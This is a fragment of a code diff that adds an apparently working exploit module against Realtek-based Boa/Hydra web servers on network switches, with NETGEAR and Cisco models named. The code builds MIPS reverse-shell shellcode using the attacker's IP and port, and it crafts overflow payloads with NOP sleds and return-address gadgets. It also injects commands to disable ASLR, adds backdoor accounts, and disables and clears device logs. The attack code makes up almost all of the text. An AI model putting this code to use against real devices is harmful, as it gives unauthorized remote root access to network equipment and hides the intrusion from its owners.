+		encrypted_passphrase = self._encrypt_RSA(string.atol(self.cisco_modulus, 16),
+												 string.atol("10001", 16),
+												 self.password)
+		return base64.b64encode(encrypted_passphrase)
+
+	def RSA_Password(self, string):
+		self.string = string
+
+		URI = target['modulus_uri']
+		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,False)
+		result = json.loads(response.read())
+
+		if result['data']['modulus']:
+			cipher = self.RSA_encrypt_params(result['data']['modulus'], str(self.string))
+		else:
+			return self.string
+
+		return urllib.quote_plus(cipher)
+
+	def check_XSID(self, target):
+		self.target = target
+
+		if self.target['xsid']:
+			return True
+		else:
+			return False
+
+	def Cisco_XSID(self,target):
+		self.target = target
+
+		URI = target['xsid_uri']
+		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,False)
+		result = json.loads(response.read())
+
+		if result['data']['modulus']:
+			cipher = self.RSA_encrypt_params(result['data']['modulus'],str(result['data']['xsid']))
+			return cipher
+		else:
+			return result['data']['xsid']
+
+	def shellcode(self):
+
+		#
+		# Reverse shell
+		#
+		# SRC: https://www.exploit-db.com/exploits/45541
+		#
+		MIPSeb = string.join([
+			"\x24\x0f\xff\xfa"	# li	$t7, -6
+			"\x01\xe0\x78\x27"	# nor $t7, $zero
+			"\x21\xe4\xff\xfd"	# addi $a0, $t7, -3
+			"\x21\xe5\xff\xfd"	# addi $a1, $t7, -3
+			"\x28\x06\xff\xff"	# slti $a2, $zero, -1
+			"\x24\x02\x10\x57"	# li	$v0, 4183 ( sys_socket )
+			"\x01\x01\x01\x0c"	# syscall 0x40404
+			"\xaf\xa2\xff\xff"	# sw	$v0, -1($sp)
+			"\x8f\xa4\xff\xff"	# lw	$a0, -1($sp)
+			"\x34\x0f\xff\xfd"	# li	$t7, -3 ( sa_family = AF_INET )
+			"\x01\xe0\x78\x27"	# nor $t7, $zero
+			"\xaf\xaf\xff\xe0"	# sw	$t7, -0x20($sp)
+			# ================ You can change port here  =================
+			"\x3c\x0ePP0PP1"	# lui $t6, 0x115c ( sin_port = 0x115c ) # 4444
+			# ============================================================
+			"\x35\xce\x7a\x69"	# ori $t6, $t6, 0x7a69 
+			"\xaf\xae\xff\xe4"	# sw	$t6, -0x1c($sp)
+			# ================ You can change ip here  =================
+			"\x3c\x0eIP1IP2"	# lui $t6, 0xc0a8	   ( sin_addr = 0xc0a8 ... # 192 168
+			"\x35\xceIP3IP4"	# ori $t6, $t6, 0x029d ... 0x3901 # 57 1
+			# ============================================================
+			"\xaf\xae\xff\xe6"	# sw	$t6, -0x1a($sp)
+			"\x27\xa5\xff\xe2"	# addiu   $a1, $sp, -0x1e
+			"\x24\x0c\xff\xef"	# li	$t4, -17  ( addrlen = 16 )
+			"\x01\x80\x30\x27"	# nor $a2, $t4, $zero
+			"\x24\x02\x10\x4a"	# li	$v0, 4170 ( sys_connect )
+			"\x01\x01\x01\x0c"	# syscall 0x40404
+			"\x24\x0f\xff\xfd"	# li	t7,-3
+			"\x01\xe0\x28\x27"	# nor a1,t7,zero
+			"\x8f\xa4\xff\xff"	# lw	$a0, -1($sp)   
+			# dup2_loop:
+			"\x24\x02\x0f\xdf"	# li	$v0, 4063 ( sys_dup2 )
+			"\x01\x01\x01\x0c"	# syscall 0x40404
+			"\x24\xa5\xff\xff"	# addi a1,a1,-1 (\x20\xa5\xff\xff)
+			"\x24\x01\xff\xff"	# li	at,-1
+			"\x14\xa1\xff\xfb"	# bne a1,at, dup2_loop
+			"\x28\x06\xff\xff"	# slti $a2, $zero, -1
+			"\x3c\x0f\x2f\x2f"	# lui $t7, 0x2f2f (//)
+			"\x35\xef\x62\x69"	# ori $t7, $t7, 0x6269 (bi)
+			"\xaf\xaf\xff\xec"	# sw	$t7, -0x14($sp)
+			"\x3c\x0e\x6e\x2f"	# lui $t6, 0x6e2f (n/)
+			"\x35\xce\x73\x68"	# ori $t6, $t6, 0x7368 (sh) 
+			"\xaf\xae\xff\xf0"	# sw	$t6, -0x10($sp)
+			"\xaf\xa0\xff\xf4"	# sw	$zero, -0xc($sp)
+			"\x27\xa4\xff\xec"	# addiu   $a0, $sp, -0x14
+			"\xaf\xa4\xff\xf8"	# sw	$a0, -8($sp)
+			"\xaf\xa0\xff\xfc"	# sw	$zero, -4($sp)
+			"\x27\xa5\xff\xf8"	# addiu   $a1, $sp, -8
+			"\x24\x02\x0f\xab"	# li	$v0, 4011 (sys_execve)
+			"\x01\x01\x01\x0c"	# syscall 0x40404
+			"\x8f\x84\x80\x18"	# Variant of NOP
+			], '')	
+
+
+		# Connect back IP
+		ip_hex = '{:02x} {:02x} {:02x} {:02x}'.format(*map(int, self.lhost.split('.')))
+		ip_hex = ip_hex.split()
+		IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];
+
+		# Let's break apart the hex code of LPORT into two bytes
+		port_hex = hex(int(self.lport))[2:]
+		port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)
+		port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))
+		port_hex = port_hex.split()
+		if len(port_hex) == 1:
+			port_hex = ('00' + ' ' + ''.join(port_hex)).split()
+
+		#
+		# Replace IP and PORT in shellcode
+		#
+		MIPSeb = MIPSeb.replace('PP0',chr(int(port_hex[0],16)))
+		MIPSeb = MIPSeb.replace('PP1',chr(int(port_hex[1],16)))
+
+		MIPSeb = MIPSeb.replace('IP1',chr(int(IP1,16)))
+		MIPSeb = MIPSeb.replace('IP2',chr(int(IP2,16)))
+		MIPSeb = MIPSeb.replace('IP3',chr(int(IP3,16)))
+		MIPSeb = MIPSeb.replace('IP4',chr(int(IP4,16)))
+
+		return MIPSeb
+
+	#
+	# Access: Unauthorized
+	#
+	# Start thread for exploting, create a listener on LPORT, wait for connection and stop the exploit thread when remote connected
+	#
+	# Note:
+	# The vulnerability are _not_ from Boa nor Hydra, coming from Realtek coding.
+	# The device should be newly restarted and/or not been accessed with http/https, so the heap is relative untouched.
+	#
+	# This code will:
+	# 1. Trigger stack overflow in boa/Hydra web server [ extractVmlinuxImage(), getFdStr() ]
+	# 2. Overwrite first byte in provided RA with 0x00, so we can jump within the binary
+	# 3. Jump to our gadget
+	# 4. Jump to NOP sled and shellcode on heap
+	# 5. Launch forked() reverse shell
+	# 6. Try restart Boa/Hydra (to mitigate DoS)
+	#
+	# Success: Reverse shell and restarted Boa/Hydra
+	# Failure: No reverse shell and crashed Boa/Hydra (DoS)
+	#
+	def heack_hydra_shell(self, target):
+		self.target = target
+
+		if not self.target['exploit']['heack_hydra_shell']['vulnerable']:
+			log.failure("Not listed as vulnerable")
+			return False
+
+		# Connect-timeout in seconds
+		timeout = 20
+		socket.setdefaulttimeout(timeout)
+
+		thread.start_new_thread(self.heack_hydra_exploit,("heack_hydra_exploit",self.target,))
+
+		lsock = listen(port=self.lport)
+		c = lsock.wait_for_connection()
+		if not self.event.is_set():
+			c.interactive(prompt = '# ')
+			return True
+		else:
+			log.failure("Got internal connection to quit")
+			c.close()
+			return False
+
+	#
+	# Access: Unauthorized
+	#
+	def heack_hydra_exploit(self, threadName, target):
+		self.threadName = threadName
+		self.target = target
+		CRLF_NOP = 0x24060d0a # NOP w/ CRLF (li $a2, 0x00000D0A)
+		NOP =  0x2406ffff	# NOP (li $a2, 0xFFFFFFFF)
+		JUMP = 0x04110111 # bal +273
+
+		# Debug
+		#CRLF_NOP = 0x4c460d0a # LF\r\n
+		#NOP = 0x6e6f6f70 # noop
+		#JUMP = 0x4a4d5044 # JMPD
+		#MIPSeb = ("\x43\x4f\x44\x45" * 45) + "\x4e\x4f\x4f\x50" # CODE + NOOP = 148 bytes
+
+		query_args = ''
+
+		#
+		# This will overwrite RA:
+		#
+		
+		#
+		# NETGEAR: 'getFdStr()' modified, this is weird 'solution' to have $t9 loaded with JMP in 'fwrite()'
+		#
+		if self.target.get('hash_uri'): # NETGEAR Inc. (GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP)
+			query_args += struct.pack('>L',(self.target['exploit']['heack_hydra_shell']['gadget'])) * 76 # direct heap address
+		else:
+			query_args += (struct.pack('>L',NOP) * 73) + struct.pack('>L',JUMP) + struct.pack('>L',NOP) # 300 bytes + RA below
+
+		#
+		# Return address to where we want jump (0x58 will be overwritten with 0x00 below)
+		query_args += struct.pack('>L',(self.target['exploit']['heack_hydra_shell']['gadget'] + 0x58000000)) # 0x58xxxxxx
+
+		#
+		# Space between new RA and overwrite with 0x00 (Range: 1 => 3)
+		#
+		query_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP)) * 2
+
+		# CRLF_NOP will overwrite '0x58' in above RA address with 0x00, as the code will always terminate CRLF with 0x00
+		#
+		# 7FF4BE60  6E 6F 6F 70 6E 6F 6F 70  6E 6F 6F 70 6E 6F 6F 70  noopnoopnoopnoop
+		# 7FF4BE70  6E 6F 6F 70 6E 6F 6F 70  6E 6F 6F 70 6E 6F 6F 70  noopnoopnoopnoop
+		# 7FF4BE80  6E 6F 6F 70 6E 6F 6F 70  4C 46 0D 0A 00 40 FF AC  noopnoopLF...@.. <=== 'X' overwritten with 0x00
+		#
+		query_args += (struct.pack('>L',NOP) * 74) + struct.pack('>L',CRLF_NOP) # 300 bytes + 0x00
+
+		#
+		# $v0 = tmpHeaderSize
+		# $gp = pointing to heap
+		#
+		# Gadget:
+		# addu $v0,	$g0 # The addition of $v0 and $g0 points to our heap NOP sled
+		# jr	$v0 	# Its lovely when [heap] are rwxp :>
+		#
+		# This adjusting $v0 value (Range: 4 => 9)
+		#
+		query_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP)) * self.target['exploit']['heack_hydra_shell']['v0']
+
+		#
+		# fork() reverse shell to get new PID, and jump over child
+		#
+		query_args += struct.pack('>L',0x24020fa2) # li $v0, 4002 ( fork )
+		query_args += struct.pack('>L',0x0101010c) # syscall unk_40404
+		query_args += struct.pack('>L',0x1c400101) # bgtz    $v0, +257 ( Jump over child to restart boa/Hydra )
+
+		#
+		# Child
+		#
+		query_args += ((struct.pack('>L',NOP) * 60) + struct.pack('>L',CRLF_NOP))
+		query_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP))
+		query_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP))
+		#
+		# Shellcode
+		#
+		query_args += self.shellcode()
+		query_args += ((struct.pack('>L',NOP) * 17) + struct.pack('>L',CRLF_NOP))
+
+		#
+		# Parent
+		#
+		query_args += (struct.pack('>L',NOP) * 59)
+		#
+		# Restart Boa/Hydra to mitigate DoS
+		# (From boa/Hydra binary == binary dependent)
+		#
+		query_args += struct.pack('>L',0x8f848018) # opcode [la $a0, 0x430000]
+		query_args += struct.pack('>L',self.target['exploit']['heack_hydra_shell']['system']) # opcode, binary dependent [la $t9, system]
+		query_args += struct.pack('>L',0x0320f809) # opcode [jalr $t9 ; system]
+		query_args += struct.pack('>L',self.target['exploit']['heack_hydra_shell']['handler']) # opcode, binary dependent [addiu $a0, (.ascii "handler -c boa &" - 0x430000)]
+		query_args += struct.pack('>L',CRLF_NOP)
+		#
+		# Parent Boa/Hydra will get SIGSEGV here, but we do not care as its restarted
+		#
+
+		URI = self.target['exploit']['heack_hydra_shell']['uri'] + (struct.pack('>L',NOP) * 247) + struct.pack('>L',JUMP) + struct.pack('>L',NOP)
+
+
+		if self.target.get('hash_uri'): # NETGEAR Inc. (GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP)
+			URI = self.target['exploit']['heack_hydra_shell']['uri']
+			URI += '&&' # align
+			URI += self.netgear_hash(URI)
+		#
+		# Everything here is designed to have opcodes properly aligned in memory
+		#
+		MESSAGE = 'POST   '+ URI + ' HTTP/1.1\r\n'	# Important with 3x 0x20 between POST and URI to align opcodes at heap
+		MESSAGE += 'Content-Length: 3133337\r\n'	# Trick Boa/Hydra to think we will send more than 1MiB
+		MESSAGE += 'Host:PWN' + '\r\n\r\n'			# 'PWN' = Align opcodes in memory
+		DEBUG("SEND",MESSAGE)
+		MESSAGE += query_args
+
+
+		log.success("Payload: {} bytes, $v0: {}".format(len(query_args),hex(len(query_args)) ))
+
+		self.rport = int(self.rhost.split(":")[1])
+		self.rhost = self.rhost.split(":")[0]
+
+		try:
+			r = remote(self.rhost,self.rport,ssl=False) # HTTP Working, about 0x105c in $v0
+			#r = remote(self.rhost,self.rport,ssl=True) # HTTPS Not working, need minimium 0x4350 in $v0
+		except Exception as e:
+			# Dirty but works
+			self.event.set()
+			remote("127.0.0.1",self.lport,ssl=False)
+			return False
+		try:
+			r.send(MESSAGE)
+			r.close()
+		except Exception as e:
+			# Dirty but works
+			self.event.set()
+			remote("127.0.0.1",self.lport,ssl=False)
+			return False
+
+	#
+	# Access: N/A
+	# Exploitable: N/A
+	#
+	# Start thread for exploting, create a listener on LPORT, wait for connection and stop the exploit thread when remote connected
+	#
+	def heack_shell(self, target):
+		self.target = target
+
+		if not self.target['exploit']['heack_cgi_shell']['vulnerable']:
+			log.failure("Not listed as vulnerable")
+			return False
+
+		thread.start_new_thread(self.heack_exploit,("heack_exploit",self.target))
+
+		l = listen(port=lport)
+		c = l.wait_for_connection()
+		if not self.event.is_set():
+			self.event.set() # Success, got the connection, stop trying to exploit
+			c.interactive(prompt = '# ')
+			return True
+		else:
+			log.failure("Got internal connection to quit")
+			c.close()
+			return False
+
+	#
+	# Access: Unauthorized
+	#
+	# This will load shellcode on remote, used for both stack and heap.
+	# stack: walk down in stack and hit the NOP sled to execute shellcode
+	# heap: walk up on heap and hit the NOP sled to execute shellcode
+	#
+	def heack_exploit(self, threadName, target):
+		self.threadName = threadName
+		self.target = target
+
+		time.sleep(2) # So this will be consistent after output from 'reverse_shell'
+		shell = log.progress('shellcode')
+
+		self.Workaround = self.target['exploit']['heack_cgi_shell']['workaround']
+
+		NOP = 0x2406ffff	# NOP (li $a2, 0xFFFFFFFF)
+
+		START = self.target['exploit']['heack_cgi_shell']['START']
+
+		if self.target['exploit']['heack_cgi_shell']['stack']:
+			EXPR = (START > self.target['exploit']['heack_cgi_shell']['STOP']) # down on stack
+		else:
+			EXPR = (START < self.target['exploit']['heack_cgi_shell']['STOP']) # up on heap
+
+		while EXPR:
+			if self.Workaround:
+				self.Workaround_logout()
+
+			shell.status("{} searching".format(hex(START)))
+			#
+			#
+			query_args = self.target['exploit']['heack_cgi_shell']['query']
+			query_args = query_args.replace("_ALIGN",self.random_string(self.target['exploit']['heack_cgi_shell']['align']))
+			query_args = query_args.replace("_USRNOP",struct.pack('>L',NOP) * self.target['exploit']['heack_cgi_shell']['usr_nop'])
+			query_args = query_args.replace("_SHELLCODE",self.shellcode())
+			query_args = query_args.replace("_PWDNOP",struct.pack('>L',NOP) * self.target['exploit']['heack_cgi_shell']['pwd_nop']) # Filler only
+
+			if self.target['login']['encryption'] == 'caesar':
+				query_args = query_args.replace("_RA_START",struct.pack('>L',START + 0xc1c1c1c1)) # caesar bug? =]
+			else:
+				query_args = query_args.replace("_RA_START",struct.pack('>L',START))
+
+			try:
+				URI = self.target['exploit']['heack_cgi_shell']['login_uri']
+				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+
+				#DEBUG("RECV",response.read())
+				#self.event.set()
+				#r = remote("127.0.0.1",self.lport,ssl=False)
+				#r.close()
+
+			except Exception as e:
+				if e.code == 502:
+					pass
+				else:
+					shell.failure(str(e))
+					self.event.set()
+					r = remote("127.0.0.1",self.lport,ssl=False)
+					r.close()
+					return False
+
+			if self.event.is_set():
+				shell.success("{} <= found".format(hex(START))) # Its lovely when [stack] are rwxp :>
+				return True
+
+			if self.target['exploit']['heack_cgi_shell']['stack']:
+				START = START - 0x30 # Walk down from top of stack
+			else:
+				START = START + 0xC00 # Walk up on heap (and bigger jumps)
+
+		shell.failure("Not found, play with start/stop addresses?")
+		# Little dirty but works
+		self.event.set()
+		r = remote("127.0.0.1",self.lport,ssl=False)
+		r.close()
+		return False
+
+	#
+	# Access: Unauthorized
+	#
+	def stack_add_account(self, target):
+		self.target = target
+
+		account = log.progress("Stack ADD Account")
+
+		if not self.target['exploit']['stack_cgi_add_account']['vulnerable']:
+			account.failure("Not listed as vulnerable")
+			return False
+
+		URI = self.target['exploit']['stack_cgi_add_account']['uri']
+
+		log.info("Credentials: {}/{}".format(str(self.credentials.split(':')[0]),str(self.credentials.split(':')[1])))
+
+		self.Workaround = self.target['exploit']['stack_cgi_add_account']['workaround']
+		if self.Workaround:
+			self.Workaround_logout()
+
+		try:
+			time.sleep(1)
+			query_args = self.target['exploit']['stack_cgi_add_account']['content']
+			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_add_account']['address'] + 0x58000000)) ) # 0x58 will be overwritten
+			query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_add_account']['account'])
+			query_args = query_args.replace("USERNAME",str(self.credentials.split(':')[0]))
+			query_args = query_args.replace("PASSWORD",str(self.credentials.split(':')[1]))
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			DEBUG("RECV",response.read())
+			account.failure(response.code)
+			return False
+
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if e.code == 502:
+				account.success("success")
+				if self.Workaround:
+					self.Workaround_logout()
+				pass
+			else:
+				account.failure(str(e))
+				return False
+	#
+	# Access: Unauthorized
+	#
+	def stack_del_account(self, target):
+		self.target = target
+
+		account = log.progress("Stack DEL Account")
+
+		if not self.target['exploit']['stack_cgi_del_account']['vulnerable']:
+			account.failure("Not listed as vulnerable")
+			return False
+
+		URI = self.target['exploit']['stack_cgi_del_account']['uri']
+
+		self.Workaround = self.target['exploit']['stack_cgi_del_account']['workaround']
+		if self.Workaround:
+			self.Workaround_logout()
+
+		try:
+			time.sleep(1)
+			query_args = self.target['exploit']['stack_cgi_del_account']['content']
+			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_del_account']['address'] + 0x58000000)) ) # 0x58 will be overwritten
+			query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_del_account']['account'])
+			query_args = query_args.replace("USERNAME",self.credentials.split(':')[0])
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			DEBUG("RECV",response.read())
+			account.failure(response.code)
+			return False
+
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if e.code == 502:
+				account.success("success")
+				if self.Workaround:
+					self.Workaround_logout()
+				pass
+			else:
+				account.failure(str(e))
+				return False
+
+	#
+	# Access: Unauthorized
+	#
+	def stack_cgi_diag(self, target):
+		self.target = target
+
+		ping = log.progress("Stack DIAG")
+
+		if not self.target['exploit']['heack_cgi_shell']['stack']:
+			ping.success("heap selected (ASLR == False)")
+			return True
+
+		if not self.target['exploit']['stack_cgi_diag']['vulnerable']:
+			ping.failure("Not listed as vulnerable")
+			return False
+
+		ASLR_ENABLED = True # Always assume that ASLR is enabled, until verified
+
+		URI = self.target['exploit']['stack_cgi_diag']['uri']
+
+		self.Workaround = self.target['exploit']['stack_cgi_diag']['workaround']
+		if self.Workaround:
+			self.Workaround_logout()
+
+		try:
+			time.sleep(1)
+			# Inject  (disable ASLR)
+			ping.status("Injecting to disable")
+			query_args = self.target['exploit']['stack_cgi_diag']['content']
+			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_diag']['web_sys_ping_post'] + 0x58000000)) ) # 0x58 will be overwritten
+			query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_diag']['sys_ping_post_cmd'])
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			DEBUG("RECV",response.read())
+
+			if self.target['exploit']['stack_cgi_diag']['sys_ping_post_SIGSEGV']:
+				if self.Workaround:
+					self.Workaround_logout()
+				ping.failure("Disable Injection: Failed!")
+				return False
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if e.code == 502:
+				ping.status("Done")
+				if self.Workaround:
+					self.Workaround_logout()
+				pass
+			else:
+				ping.failure(str(e))
+				return False
+
+		if self.target['exploit']['stack_cgi_diag']['sys_ping_post_check']:
+			try:
+				time.sleep(1)
+				# Inject  (check ASLR)
+				ping.status("Injecting to verify")
+				query_args = self.target['exploit']['stack_cgi_diag']['content']
+				query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_diag']['web_sys_ping_post'] + 0x58000000)) ) # 0x58 will be overwritten
+				query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_diag']['sys_ping_post_check'])
+				DEBUG("SEND",(URI, query_args))
+
+				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+				DEBUG("RECV",response.read())
+
+				if self.Workaround:
+					self.Workaround_logout()
+				ping.failure("Verify Injection: Failed!")
+
+
+			except Exception as e:
+				DEBUG("RECV",str(e))
+				if e.code == 502:
+					time.sleep(1)
+					ping.status("Verifying ASLR")
+					if self.Workaround:
+						self.Workaround_logout()
+				else:
+					ping.failure(str(e))
+					return False
+
+		try:
+			time.sleep(1)
+			URI = self.target['exploit']['stack_cgi_diag']['verify_uri']
+			DEBUG("SEND",URI)
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+			response = response.read().split()
+			DEBUG("RECV",response)
+
+			if response[0] == '0':
+				ping.success("ASLR disabled")
+				return True
+			else:
+				ping.failure("ASLR still enabled")
+				return False
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if force:
+				ping.success("Forcing... ASLR might been disabled")
+				return True
+			else:
+				ping.failure(str(e))
+				log.failure("You can try with --force, some FW do not process correctly after ASLR been disabled")
+				log.failure("or you can give --auth_shell a try instead")
+				return False
+
+	#
+	# Access: Unauthorized
+	#
+	def stack_cgi_sntp(self, target):
+		self.target = target
+
+		SNTP = log.progress("Stack SNTP")
+
+		if not self.target['exploit']['heack_cgi_shell']['stack']:
+			SNTP.success("heap selected (ASLR == False)")
+			return True
+
+		if not self.target['exploit']['stack_cgi_sntp']['vulnerable']:
+			SNTP.failure("Not listed as vulnerable")
+			return False
+
+		ASLR_ENABLED = True
+		URI = self.target['exploit']['stack_cgi_sntp']['uri']
+
+		self.Workaround = self.target['exploit']['stack_cgi_sntp']['workaround']
+		if self.Workaround:
+			self.Workaround_logout()
+
+		try:
+			time.sleep(1)
+			# Enable SNTP
+			SNTP.status("Enable SNTP")
+			query_args = self.target['exploit']['stack_cgi_sntp']['content']
+			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set'] + 0x58000000)) ) # 0x58 will be overwritten
+			query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_cmd_enable'])
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			DEBUG("RECV",response.read())
+
+			if self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_SIGSEGV']:
+				SNTP.failure("Enable SNTP: Failed!")
+				return False
+
+			if self.Workaround:
+				self.Workaround_logout()
+
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if e.code == 502:
+				SNTP.status("SNTP Enabled")
+				if self.Workaround:
+					self.Workaround_logout()
+				pass
+			else:
+				SNTP.failure(str(e))
+				return False
+
+		try:
+			time.sleep(1)
+			# Inject SNTP (disable ASLR)
+			SNTP.status("Injecting to disable")
+			query_args = self.target['exploit']['stack_cgi_sntp']['content']
+			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set'] + 0x58000000)) ) # 0x58 will be overwritten
+			query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set_cmd'])
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			DEBUG("RECV",response.read())
+
+			if self.Workaround:
+				self.Workaround_logout()
+			SNTP.failure("Disable Injection: Failed!")
+			return False
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if e.code == 502:
+				SNTP.status("Done")
+				if self.Workaround:
+					self.Workaround_logout()
+				pass
+			else:
+				SNTP.failure(str(e))
+				return False
+
+		if self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set_check']:
+			try:
+				time.sleep(1)
+				# Inject SNTP (check ASLR)
+				SNTP.status("Injecting to verify")
+				query_args = self.target['exploit']['stack_cgi_sntp']['content']
+				query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set'] + 0x58000000)) ) # 0x58 will be overwritten
+				query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_sntp']['sys_timeSntp_set_check'])
+				DEBUG("SEND",(URI, query_args))
+
+				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+				DEBUG("RECV",response.read())
+
+				if self.Workaround:
+					self.Workaround_logout()
+				SNTP.failure("Verify Injection: Failed!")
+				return False
+			except Exception as e:
+				DEBUG("RECV",str(e))
+				if e.code == 502:
+					pass
+				else:
+					SNTP.failure(str(e))
+					return False
+
+
+		SNTP.status("Verifying ASLR")
+		if self.Workaround:
+			self.Workaround_logout()
+
+		try:
+			time.sleep(1)
+			URI = self.target['exploit']['stack_cgi_sntp']['verify_uri']
+			DEBUG("SEND",URI)
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+			response = response.read().split()
+			DEBUG("RECV",response)
+
+			if response[0] == '0':
+				SNTP.success("ASLR disabled")
+				ASLR_ENABLED = False
+			else:
+				SNTP.failure("ASLR Enabled")
+				return False
+
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if force:
+				SNTP.success("Forcing... ASLR might been disabled")
+			else:
+				SNTP.failure(str(e))
+				return False
+
+		try:
+			time.sleep(1)
+			# Delete SNTP injection
+			URI = self.target['exploit']['stack_cgi_sntp']['uri']
+			SNTP.status("Removing injection")
+			query_args = self.target['exploit']['stack_cgi_sntp']['content']
+			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSntpDel_set'] + 0x58000000)) ) # 0x58 will be overwritten
+			query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_sntp']['sys_timeSntpDel_set_cmd'])
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			DEBUG("RECV",response.read())
+
+			SNTP.failure("Removing injection: Failed!")
+			if self.Workaround:
+				self.Workaround_logout()
+			return False
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if e.code == 502:
+				SNTP.status("Done")
+				if self.Workaround:
+					self.Workaround_logout()
+				pass
+			else:
+				SNTP.failure(str(e))
+				return False
+
+		try:
+			time.sleep(1)
+			# Disable SNTP
+			SNTP.status("Disable SNTP")
+			query_args = self.target['exploit']['stack_cgi_sntp']['content']
+			query_args = query_args.replace("_JUMP_", urllib.quote_plus(struct.pack('>L',self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set'] + 0x58000000)) ) # 0x58 will be overwritten
+			query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_cmd_disable'])
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			DEBUG("RECV",response.read())
+
+			if self.target['exploit']['stack_cgi_sntp']['sys_timeSettings_set_SIGSEGV']:
+				SNTP.failure("Disable SNTP: Failed!")
+				return False
+
+			if self.Workaround:
+				self.Workaround_logout()
+
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if e.code == 502:
+				SNTP.status("SNTP Disabled")
+				if self.Workaround:
+					self.Workaround_logout()
+				pass
+			else:
+				SNTP.failure(str(e))
+				return False
+
+
+		if not ASLR_ENABLED:
+			SNTP.success("Success")
+			return True
+		else:
+			SNTP.failure("ASLR Enabled: Failure")
+			return False
+
+	#
+	# Access: Unauthorized
+	#
+	def stack_cgi_log(self, target):
+		self.target = target
+
+		self.Workaround = self.target['exploit']['stack_cgi_log']['workaround']
+
+		if self.Workaround:
+			self.Workaround_logout()
+
+		URI = self.target['exploit']['stack_cgi_log']['uri']
+
+		logging = log.progress("Stack LOG disable & clean")
+		if not self.target['exploit']['stack_cgi_log']['vulnerable']:
+			logging.failure("No logging on this switch (?)")
+			return True
+		try:
+			# Disable logging
+			time.sleep(1)
+			logging.status("Trying to disable")
+			query_args = self.target['exploit']['stack_cgi_log']['content']
+			query_args = query_args.replace("_JUMP_", struct.pack('>L',self.target['exploit']['stack_cgi_log']['log_settings_set'] + 0x58000000) ) # 0x58 will be overwritten
+			query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_log']['log_settings_set_cmd'])
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
